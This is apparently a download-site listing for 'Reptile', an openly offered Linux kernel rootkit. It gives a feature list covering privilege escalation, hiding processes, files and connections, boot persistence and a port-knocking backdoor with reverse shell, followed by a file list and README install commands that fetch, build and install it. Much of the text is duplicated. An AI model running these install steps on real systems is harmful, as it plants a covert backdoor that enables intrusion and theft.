Reptile Rootkit for Linux
说明: Features
Give root to unprivileged users
Hide files and directories
Hide processes
Hide himself
Hide TCP/UDP connections
Hidden boot persistence
File content tampering
Some obfuscation techniques
ICMP/UDP/TCP port-knocking backdoor
Full TTY/PTY shell with file transfer
Client to handle Reptile Shell
Shell connect back each X times (not default)
文件列表:
Kconfig (1922, 2020-06-28)
Makefile (1852, 2020-06-28)
configs (0, 2020-06-28)
configs\defconfig (530, 2020-06-28)
kernel (0, 2020-06-28)
kernel\Kbuild (1693, 2020-06-28)
kernel\backdoor.c (5552, 2020-06-28)
kernel\dir.c (404, 2020-06-28)
kernel\encrypt (0, 2020-06-28)
kernel\encrypt\encrypt.c (942, 2020-06-28)
kernel\file.c (1077, 2020-06-28)
kernel\include (0, 2020-06-28)
kernel\include\backdoor.h (63, 2020-06-28)
kernel\include\config.h (733, 2020-06-28)
kernel\include\dir.h (51, 2020-06-28)
kernel\include\encrypt.h (499, 2020-06-28)
kernel\include\file.h (311, 2020-06-28)
kernel\include\module.h (23, 2020-06-28)
kernel\include\network.h (271, 2020-06-28)
kernel\include\proc.h (373, 2020-06-28)
kernel\include\string_helpers.h (404, 2020-06-28)
kernel\include\util.h (2043, 2020-06-28)
kernel\khook (0, 2020-06-28)
kernel\khook\engine.c (3669, 2020-06-28)
kernel\khook\engine.h (1189, 2020-06-28)
kernel\khook\engine.lds (84, 2020-06-28)
kernel\khook\internal.h (1211, 2020-06-28)
kernel\khook\x86 (0, 2020-06-28)
kernel\khook\x86\Makefile (306, 2020-06-28)
kernel\khook\x86\hook.c (2605, 2020-06-28)
kernel\khook\x86\stub.S (1083, 2020-06-28)
kernel\khook\x86\stub.inc (1017, 2020-06-28)
kernel\khook\x86\stub32.inc (469, 2020-06-28)
kernel\kmatryoshka (0, 2020-06-28)
kernel\kmatryoshka\Kbuild (323, 2020-06-28)
... ...
Makefile (1852, 2020-06-28)
configs (0, 2020-06-28)
configs\defconfig (530, 2020-06-28)
kernel (0, 2020-06-28)
kernel\Kbuild (1693, 2020-06-28)
kernel\backdoor.c (5552, 2020-06-28)
kernel\dir.c (404, 2020-06-28)
kernel\encrypt (0, 2020-06-28)
kernel\encrypt\encrypt.c (942, 2020-06-28)
kernel\file.c (1077, 2020-06-28)
kernel\include (0, 2020-06-28)
kernel\include\backdoor.h (63, 2020-06-28)
kernel\include\config.h (733, 2020-06-28)
kernel\include\dir.h (51, 2020-06-28)
kernel\include\encrypt.h (499, 2020-06-28)
kernel\include\file.h (311, 2020-06-28)
kernel\include\module.h (23, 2020-06-28)
kernel\include\network.h (271, 2020-06-28)
kernel\include\proc.h (373, 2020-06-28)
kernel\include\string_helpers.h (404, 2020-06-28)
kernel\include\util.h (2043, 2020-06-28)
kernel\khook (0, 2020-06-28)
kernel\khook\engine.c (3669, 2020-06-28)
kernel\khook\engine.h (1189, 2020-06-28)
kernel\khook\engine.lds (84, 2020-06-28)
kernel\khook\internal.h (1211, 2020-06-28)
kernel\khook\x86 (0, 2020-06-28)
kernel\khook\x86\Makefile (306, 2020-06-28)
kernel\khook\x86\hook.c (2605, 2020-06-28)
kernel\khook\x86\stub.S (1083, 2020-06-28)
kernel\khook\x86\stub.inc (1017, 2020-06-28)
kernel\khook\x86\stub32.inc (469, 2020-06-28)
kernel\kmatryoshka (0, 2020-06-28)
kernel\kmatryoshka\Kbuild (323, 2020-06-28)
... ...
# Reptile
## Tested on **Debian 9**: 4.9.0-8-amd***
**Debian 10**: 4.19.0-8-amd***
**Ubuntu 18.04.1 LTS**: 4.15.0-38-generic
**Kali Linux**: 4.18.0-kali2-amd***
**Centos 6.10**: 2.6.32-754.6.3.el6.x86_***
**Centos 7**: 3.10.0-862.3.2.el7.x86_***
**Centos 8**: 4.18.0-147.5.1.el8_1.x86_*** ## Features - Give root to unprivileged users - Hide files and directories - Hide processes - Hide himself - Hide TCP/UDP connections - Hidden boot persistence - File content tampering - Some obfuscation techniques - ICMP/UDP/TCP port-knocking backdoor - Full TTY/PTY shell with file transfer - Client to handle Reptile Shell - Shell connect back each X times (not default) ## Install ``` apt install build-essential libncurses-dev linux-headers-$(uname -r) git clone https://github.com/f0rb1dd3n/Reptile.git cd Reptile make menuconfig # or 'make config' or even 'make defconfig' make make install ``` More details about the installation see [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Install) ## Uninstall When you got a sucessfully installation, the way to remove that will be shown in the screen ## Usage See [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Usage) to usage details. So, read the ***ing manual before opening an issue! ## Warning Some functions of this module is based on another rootkits. Please see the references! ## References - “[LKM HACKING](http://www.ouah.org/LKM_HACKING.html)”, The Hackers Choice (THC), 1999; - https://github.com/mncoppola/suterusu - https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git - https://github.com/creaktive/tsh - https://github.com/brenns10/lsh ## Thanks Special thanks to my friend [Ilya V. Matveychikov](https://github.com/milabs) for the [KHOOK](https://github.com/milabs/khook) framework and [kmatryoshka](https://github.com/milabs/kmatryoshka) loader. ## Disclaimer If you wanna more information, send me an e-mail: f0rb1dd3n@tuta.io
## Tested on **Debian 9**: 4.9.0-8-amd***
**Debian 10**: 4.19.0-8-amd***
**Ubuntu 18.04.1 LTS**: 4.15.0-38-generic
**Kali Linux**: 4.18.0-kali2-amd***
**Centos 6.10**: 2.6.32-754.6.3.el6.x86_***
**Centos 7**: 3.10.0-862.3.2.el7.x86_***
**Centos 8**: 4.18.0-147.5.1.el8_1.x86_*** ## Features - Give root to unprivileged users - Hide files and directories - Hide processes - Hide himself - Hide TCP/UDP connections - Hidden boot persistence - File content tampering - Some obfuscation techniques - ICMP/UDP/TCP port-knocking backdoor - Full TTY/PTY shell with file transfer - Client to handle Reptile Shell - Shell connect back each X times (not default) ## Install ``` apt install build-essential libncurses-dev linux-headers-$(uname -r) git clone https://github.com/f0rb1dd3n/Reptile.git cd Reptile make menuconfig # or 'make config' or even 'make defconfig' make make install ``` More details about the installation see [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Install) ## Uninstall When you got a sucessfully installation, the way to remove that will be shown in the screen ## Usage See [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Usage) to usage details. So, read the ***ing manual before opening an issue! ## Warning Some functions of this module is based on another rootkits. Please see the references! ## References - “[LKM HACKING](http://www.ouah.org/LKM_HACKING.html)”, The Hackers Choice (THC), 1999; - https://github.com/mncoppola/suterusu - https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git - https://github.com/creaktive/tsh - https://github.com/brenns10/lsh ## Thanks Special thanks to my friend [Ilya V. Matveychikov](https://github.com/milabs) for the [KHOOK](https://github.com/milabs/khook) framework and [kmatryoshka](https://github.com/milabs/kmatryoshka) loader. ## Disclaimer If you wanna more information, send me an e-mail: f0rb1dd3n@tuta.io
近期下载者:
相关文件:
收藏者: